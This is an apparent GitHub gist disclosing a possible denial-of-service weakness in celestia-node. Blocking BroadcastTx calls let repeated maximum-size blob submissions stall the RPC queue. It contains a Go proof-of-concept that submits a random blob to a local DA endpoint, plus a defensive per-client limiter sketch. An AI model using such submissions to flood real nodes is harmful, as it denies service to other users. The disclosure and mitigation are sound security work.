@tuxcanfly
Last active January 31, 2024 20:21

While debugging rollkit #1036 I came across a potential DOS vector.

Since celestia-node calls the blocking method BroadcastTx on celestia-core, which itself blocks on transaction subscription events, a potential adversary can repeatedly trigger maliciously blocking transactions so that the RPC endpoint has to queue other valid transactions, timing them out as well. This is a potential DOS vector.

Example of a malicious transaction: submit a max-size blob. This seems to time out on testnet with:

```
2024/01/26 01:56:14 code = Unknown desc = timed out waiting for tx to be included in a block
```

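```go
package main

// The gist does not show its imports; crypto/rand is assumed for rand.Read.
import (
	"context"
	"crypto/rand"
	"fmt"
	"log"

	"github.com/rollkit/go-da"
	goDAProxy "github.com/rollkit/go-da/proxy"
	"google.golang.org/grpc"
	"google.golang.org/grpc/credentials/insecure"
)

// getRandomBlob returns a blob of random bytes.
// <size> is a placeholder left unfilled in the gist.
func getRandomBlob() []byte {
	randomByteSlice := make([]byte, <size>)
	_, err := rand.Read(randomByteSlice)
	if err != nil {
		panic(err)
	}

	return randomByteSlice
}

// submitDARequest submits a request to da.DAService.Submit
func submitDARequest() {
	// Create a gRPC client
	client := goDAProxy.NewClient()
	err := client.Start("127.0.0.1:26650", grpc.WithTransportCredentials(insecure.NewCredentials()))
	if err != nil {
		panic(err)
	}

	// Build the list of blobs to submit
	blobs := []da.Blob{getRandomBlob()}

	// Make the gRPC call; it blocks until the transaction is included or times out
	ids, _, err := client.Submit(context.Background(), blobs, -1)
	if err != nil {
		log.Fatalf("Error during gRPC call: %v", err)
	}

	// Print the returned IDs (err is nil here)
	fmt.Println(ids)
}

func main() {
	submitDARequest()
}
```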
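A defensive sketch for the queueing problem described above, added here as an example (not code from this gist, celestia-node or rollkit): a wrapper that caps in-flight blocking submissions per client and bounds each call with a deadline, so one caller's stuck transactions cannot hold up other callers. `Limiter`, `SubmitFunc`, `ErrBusy` and the client identifiers are hypothetical names, and the blob is constructed sample data.

```go
package main

import (
	"context"
	"errors"
	"fmt"
	"sync"
	"time"
)

// ErrBusy: the caller already has its maximum number of submissions in flight.
var ErrBusy = errors.New("too many in-flight submissions for this client")

// SubmitFunc is a hypothetical stand-in for a blocking broadcast call.
type SubmitFunc func(ctx context.Context, blob []byte) error

// Limiter caps in-flight blocking submissions per client and bounds each with a deadline.
type Limiter struct {
	mu        sync.Mutex
	inFlight  map[string]int
	perClient int
	timeout   time.Duration
}

func NewLimiter(perClient int, timeout time.Duration) *Limiter {
	return &Limiter{inFlight: map[string]int{}, perClient: perClient, timeout: timeout}
}

// Submit fails fast with ErrBusy instead of queueing behind the client's own slow calls.
func (l *Limiter) Submit(ctx context.Context, client string, blob []byte, f SubmitFunc) error {
	l.mu.Lock()
	if l.inFlight[client] >= l.perClient {
		l.mu.Unlock()
		return ErrBusy
	}
	l.inFlight[client]++
	l.mu.Unlock()
	defer func() { l.mu.Lock(); l.inFlight[client]--; l.mu.Unlock() }()

	ctx, cancel := context.WithTimeout(ctx, l.timeout)
	defer cancel()
	return f(ctx, blob)
}

func main() {
	l := NewLimiter(1, 50*time.Millisecond)
	// stuck simulates a transaction that is never included in a block.
	stuck := func(ctx context.Context, _ []byte) error { <-ctx.Done(); return ctx.Err() }
	fmt.Println(l.Submit(context.Background(), "client-a", []byte("constructed blob"), stuck))
}
```

The limiter only helps if the wrapped call honours context cancellation; a call that ignores `ctx` still holds its slot until it returns.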